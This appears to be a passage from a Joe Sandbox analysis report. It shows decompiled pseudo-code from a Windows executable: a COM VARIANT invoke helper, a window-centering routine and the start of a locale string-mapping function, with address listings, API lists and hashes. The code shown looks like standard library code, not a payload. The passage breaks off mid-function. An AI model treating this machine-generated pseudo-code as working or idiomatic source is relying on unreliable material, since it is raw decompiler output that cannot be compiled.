								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M0043017B))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M0043012B))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E00408F24(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E00422EAF(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
							_t214 = 0;
						}
					}
					_t242 = 0;
					E0041162C(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E00412140(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x44ddcc, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L0042446B(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E00424440(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(_t178 == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E0042FBE4(_t178);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E00409CC2(_t113, _t247,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E00409CC2(_t117, _t247,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E00409CC2(_t121, _t247,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E004128BF(_t247 + 0x14, 0x452e7c);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E0042E969(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M004301C7))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E0042E38D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}






































                                                                              0x0042fcbb
                                                                              0x0042fcc0
                                                                              0x0042fcc8
                                                                              0x0042fccb
                                                                              0x0042fcd1
                                                                              0x0042fcd5
                                                                              0x0042fcd8
                                                                              0x0042fce5
                                                                              0x0042fcea
                                                                              0x0042fced
                                                                              0x0042fcf2
                                                                              0x0042fd00
                                                                              0x0042fcf4
                                                                              0x0042fcf5
                                                                              0x0042fcfb
                                                                              0x0042fcfb
                                                                              0x0042fd07
                                                                              0x0042fd0e
                                                                              0x0042fd13
                                                                              0x0042fd1a
                                                                              0x0042fd1a
                                                                              0x0042fd1f
                                                                              0x0042fd2e
                                                                              0x0042fd39
                                                                              0x0042fd3c
                                                                              0x0042fd47
                                                                              0x0042fd4d
                                                                              0x0042fd51
                                                                              0x0042fd54
                                                                              0x0042fd57
                                                                              0x0042fd5d
                                                                              0x0042fd60
                                                                              0x0042fd63
                                                                              0x0042fd63
                                                                              0x0042fd6b
                                                                              0x0042fd6e
                                                                              0x0042fd71
                                                                              0x0042fd72
                                                                              0x0042fd75
                                                                              0x0042fd7b
                                                                              0x0042fd7e
                                                                              0x0042fd81
                                                                              0x0042fd8b
                                                                              0x0042fd8b
                                                                              0x0042fd8e
                                                                              0x0042fd96
                                                                              0x0042fd98
                                                                              0x0042fec8
                                                                              0x0042fecd
                                                                              0x0042fed0
                                                                              0x0042fed2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fed9
                                                                              0x0042fedc
                                                                              0x0042fede
                                                                              0x0042fee4
                                                                              0x0042feec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fed2
                                                                              0x0042fd9e
                                                                              0x0042fd9e
                                                                              0x0042fef0
                                                                              0x0042fef0
                                                                              0x0042fef3
                                                                              0x0042fef3
                                                                              0x0042fef5
                                                                              0x0042fef7
                                                                              0x0042fef7
                                                                              0x0042fda4
                                                                              0x0042fda5
                                                                              0x0042fda9
                                                                              0x0042fdaf
                                                                              0x00000000
                                                                              0x0042fdb6
                                                                              0x0042fdb9
                                                                              0x0042fdbb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fde4
                                                                              0x0042fde8
                                                                              0x0042fded
                                                                              0x0042fdf0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fdf7
                                                                              0x0042fdfb
                                                                              0x0042fe00
                                                                              0x0042fe03
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fe0a
                                                                              0x0042fe0d
                                                                              0x0042fe0d
                                                                              0x0042fe0f
                                                                              0x0042fe11
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fe20
                                                                              0x0042fe23
                                                                              0x0042fe25
                                                                              0x0042fe27
                                                                              0x0042fe28
                                                                              0x0042fe2b
                                                                              0x0042fe31
                                                                              0x0042fe35
                                                                              0x0042fe37
                                                                              0x0042fe3d
                                                                              0x0042fe3f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fe3f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fea0
                                                                              0x0042fea3
                                                                              0x0042fea7
                                                                              0x0042fea9
                                                                              0x0042fdbe
                                                                              0x0042fdbe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042feb0
                                                                              0x0042feb4
                                                                              0x0042feb7
                                                                              0x0042feba
                                                                              0x0042febc
                                                                              0x0042febd
                                                                              0x0042febe
                                                                              0x0042febf
                                                                              0x0042fec0
                                                                              0x0042fec3
                                                                              0x0042fec5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fe4a
                                                                              0x0042fe4a
                                                                              0x0042fe4d
                                                                              0x0042fe4f
                                                                              0x0042fe51
                                                                              0x0042fe53
                                                                              0x0042fe56
                                                                              0x0042fe5b
                                                                              0x0042fe61
                                                                              0x0042fe62
                                                                              0x0042fe65
                                                                              0x0042fe67
                                                                              0x0042fe6a
                                                                              0x0042fe6a
                                                                              0x0042fe72
                                                                              0x0042fe7e
                                                                              0x0042fe7e
                                                                              0x0042fe83
                                                                              0x0042fe84
                                                                              0x0042fe8a
                                                                              0x0042fe8e
                                                                              0x0042fe90
                                                                              0x0042fe92
                                                                              0x0042fe94
                                                                              0x0042fe45
                                                                              0x0042fe45
                                                                              0x00000000
                                                                              0x0042fe45
                                                                              0x0042fe94
                                                                              0x0042fe96
                                                                              0x0042fe99
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fdd6
                                                                              0x0042fdd9
                                                                              0x0042fddd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fdc6
                                                                              0x0042fdc9
                                                                              0x0042fdcc
                                                                              0x0042fdce
                                                                              0x0042fdd1
                                                                              0x0042fe13
                                                                              0x0042fe13
                                                                              0x0042fe18
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fdaf
                                                                              0x0042fda9
                                                                              0x0042fd9e
                                                                              0x0042fef9
                                                                              0x0042fef9
                                                                              0x0042fefd
                                                                              0x0042ff00
                                                                              0x0042ff09
                                                                              0x0042ff09
                                                                              0x0042ff12
                                                                              0x0042ff15
                                                                              0x0042ff15
                                                                              0x0042fd57
                                                                              0x0042ff1b
                                                                              0x0042ff1d
                                                                              0x0042ff26
                                                                              0x0042ff28
                                                                              0x0042ff28
                                                                              0x0042ff32
                                                                              0x0042ff3a
                                                                              0x0042ff3c
                                                                              0x0042ff62
                                                                              0x0042ff65
                                                                              0x0042ff6a
                                                                              0x0042ff75
                                                                              0x0042ff79
                                                                              0x0042ff7b
                                                                              0x0042ff7d
                                                                              0x0042ff7d
                                                                              0x0042ff81
                                                                              0x0042ff88
                                                                              0x0042ff88
                                                                              0x0042ff8e
                                                                              0x0042ff91
                                                                              0x0042ff92
                                                                              0x0042ff92
                                                                              0x0042ff7d
                                                                              0x0042ff7b
                                                                              0x0042ff97
                                                                              0x0042ff9a
                                                                              0x0042ffa4
                                                                              0x0042ffa5
                                                                              0x0043005c
                                                                              0x0043005c
                                                                              0x0043005f
                                                                              0x00430062
                                                                              0x00430068
                                                                              0x0043006c
                                                                              0x00430070
                                                                              0x00430075
                                                                              0x0043007b
                                                                              0x0043007d
                                                                              0x0043007f
                                                                              0x00430085
                                                                              0x0043008b
                                                                              0x00000000
                                                                              0x0043008b
                                                                              0x0043007f
                                                                              0x00000000
                                                                              0x0043006c
                                                                              0x0042ffab
                                                                              0x0042ffaf
                                                                              0x0042ffbc
                                                                              0x0042ffc6
                                                                              0x0042ffc9
                                                                              0x0042ffcf
                                                                              0x0042ffcf
                                                                              0x0042ffd4
                                                                              0x0042ffd9
                                                                              0x0042ffda
                                                                              0x0042ffdd
                                                                              0x0042ffdf
                                                                              0x0042ffe2
                                                                              0x0042fff4
                                                                              0x0042fff4
                                                                              0x0042ffe4
                                                                              0x0042ffe4
                                                                              0x0042ffe7
                                                                              0x0042ffe9
                                                                              0x0042ffea
                                                                              0x0042fff0
                                                                              0x0042fff0
                                                                              0x0042fff6
                                                                              0x0042fffa
                                                                              0x0042fffd
                                                                              0x00430003
                                                                              0x00430008
                                                                              0x00430008
                                                                              0x0043000b
                                                                              0x00430013
                                                                              0x00430013
                                                                              0x00430015
                                                                              0x00430018
                                                                              0x0043001d
                                                                              0x0043001d
                                                                              0x00430020
                                                                              0x00430028
                                                                              0x00430028
                                                                              0x0043002a
                                                                              0x0043002d
                                                                              0x00430032
                                                                              0x00430032
                                                                              0x00430035
                                                                              0x0043003d
                                                                              0x0043003d
                                                                              0x00430042
                                                                              0x00430048
                                                                              0x00430054
                                                                              0x00430057
                                                                              0x00000000
                                                                              0x0042ffbe
                                                                              0x0042ffbe
                                                                              0x0043008c
                                                                              0x0043008c
                                                                              0x00430091
                                                                              0x00430094
                                                                              0x0043009a
                                                                              0x0043009c
                                                                              0x00000000
                                                                              0x004300ad
                                                                              0x004300b4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0043010f
                                                                              0x00430112
                                                                              0x00430115
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300cc
                                                                              0x004300cf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300d6
                                                                              0x004300d9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300b9
                                                                              0x004300bc
                                                                              0x004300bf
                                                                              0x004300c1
                                                                              0x004300c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300e3
                                                                              0x004300e8
                                                                              0x004300eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300f3
                                                                              0x004300f6
                                                                              0x004300f8
                                                                              0x004300fc
                                                                              0x004300ff
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00430103
                                                                              0x00430106
                                                                              0x00430109
                                                                              0x0043010a
                                                                              0x0043010b
                                                                              0x0043010c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300a3
                                                                              0x004300a9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0043009c
                                                                              0x0043009a
                                                                              0x0042ffbc
                                                                              0x0042ffa5
                                                                              0x00430117
                                                                              0x0043011d
                                                                              0x00430128

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042FCBB
                                                                              • lstrlenA.KERNEL32(?,?,?), ref: 0042FCF5
                                                                              • VariantClear.OLEAUT32(?), ref: 0042FF88
                                                                              • VariantClear.OLEAUT32(?), ref: 0042FFAF
                                                                              • SysFreeString.OLEAUT32(?), ref: 00430013
                                                                              • SysFreeString.OLEAUT32(?), ref: 00430028
                                                                              • SysFreeString.OLEAUT32(?), ref: 0043003D
                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 00430075
                                                                              • VariantClear.OLEAUT32(?), ref: 00430085
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                              • String ID:
                                                                              • API String ID: 344392101-0
                                                                              • Opcode ID: 3b057a521ef479f7f189b715b034f6f8b40d57809903969610460b76977b1eba
                                                                              • Instruction ID: b228736aa9f8fd026ff5359b619d8e15a9365acb0fa6e0a946a76f8a86906c3d
                                                                              • Opcode Fuzzy Hash: 3b057a521ef479f7f189b715b034f6f8b40d57809903969610460b76977b1eba
                                                                              • Instruction Fuzzy Hash: 2BE1CF71A0021ADFCF11DFA8E880AAEBBB4FF09304F94013AE951A7261D7789D55CF59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00425CF5, Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 90%
                                                                              			E00425CF5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E00428375(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E00409286(E0040921B(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E00408116();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E00409286(E0040921B(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E0042856F(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                              0x00425cf5
                                                                              0x00425cfd
                                                                              0x00425d00
                                                                              0x00425d08
                                                                              0x00425d0b
                                                                              0x00425d10
                                                                              0x00425d1b
                                                                              0x00425d2d
                                                                              0x00425d1d
                                                                              0x00425d20
                                                                              0x00425d20
                                                                              0x00425d33
                                                                              0x00425d37
                                                                              0x00425d43
                                                                              0x00425d4b
                                                                              0x00425d4d
                                                                              0x00425d4d
                                                                              0x00425d4b
                                                                              0x00425d12
                                                                              0x00425d12
                                                                              0x00425d12
                                                                              0x00425d5c
                                                                              0x00425d62
                                                                              0x00425e02
                                                                              0x00425e09
                                                                              0x00425e10
                                                                              0x00425e1a
                                                                              0x00425d68
                                                                              0x00425d6a
                                                                              0x00425d6f
                                                                              0x00425d7a
                                                                              0x00425d83
                                                                              0x00425d83
                                                                              0x00425d7a
                                                                              0x00425d87
                                                                              0x00425d8e
                                                                              0x00425dcf
                                                                              0x00425dde
                                                                              0x00425deb
                                                                              0x00425d90
                                                                              0x00425d90
                                                                              0x00425d97
                                                                              0x00425d99
                                                                              0x00425d99
                                                                              0x00425da9
                                                                              0x00425dbc
                                                                              0x00425dc6
                                                                              0x00425dc6
                                                                              0x00425d8e
                                                                              0x00425e29
                                                                              0x00425e2e
                                                                              0x00425e34
                                                                              0x00425e3b
                                                                              0x00425e3e
                                                                              0x00425e45
                                                                              0x00425e4c
                                                                              0x00425e53
                                                                              0x00425e5a
                                                                              0x00425e5f
                                                                              0x00425e66
                                                                              0x00425e6d
                                                                              0x00425e75
                                                                              0x00425e75
                                                                              0x00425e61
                                                                              0x00425e61
                                                                              0x00425e61
                                                                              0x00425e7a
                                                                              0x00425e86
                                                                              0x00425e8e
                                                                              0x00425e8e
                                                                              0x00425e7c
                                                                              0x00425e7c
                                                                              0x00425e7c
                                                                              0x00425ea7

                                                                              APIs
                                                                                • Part of subcall function 00428375: GetWindowLongA.USER32 ref: 00428380
                                                                              • GetParent.USER32(?), ref: 00425D20
                                                                              • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00425D43
                                                                              • GetWindowRect.USER32 ref: 00425D5C
                                                                              • GetWindowLongA.USER32 ref: 00425D6F
                                                                              • CopyRect.USER32 ref: 00425DBC
                                                                              • CopyRect.USER32 ref: 00425DC6
                                                                              • GetWindowRect.USER32 ref: 00425DCF
                                                                              • CopyRect.USER32 ref: 00425DEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                              • String ID:
                                                                              • API String ID: 808654186-0
                                                                              • Opcode ID: 154255a76cca9447de4351d56dab5eca5582396a9e15d9205caf6b4785139203
                                                                              • Instruction ID: 35932f71d77ad1146e83b777f3b005d173e21e8154cefdfefc433d27175537c6
                                                                              • Opcode Fuzzy Hash: 154255a76cca9447de4351d56dab5eca5582396a9e15d9205caf6b4785139203
                                                                              • Instruction Fuzzy Hash: 2D51C771A00629AFCB04DBA8ED49EEEB7BDAF44300F454125E501F3291DB74ED018B58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419558, Relevance: 16.8, APIs: 11, Instructions: 299COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E00419558(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				int _t157;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x44c648);
				E00412BA4(__ebx, __edi, __esi);
				_t199 =  *0x45a748; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x44bd1c, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x45a748 = 2;
						}
					} else {
						 *0x45a748 = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x45a748; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x45a730; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x45a740; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E0041AED4( *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
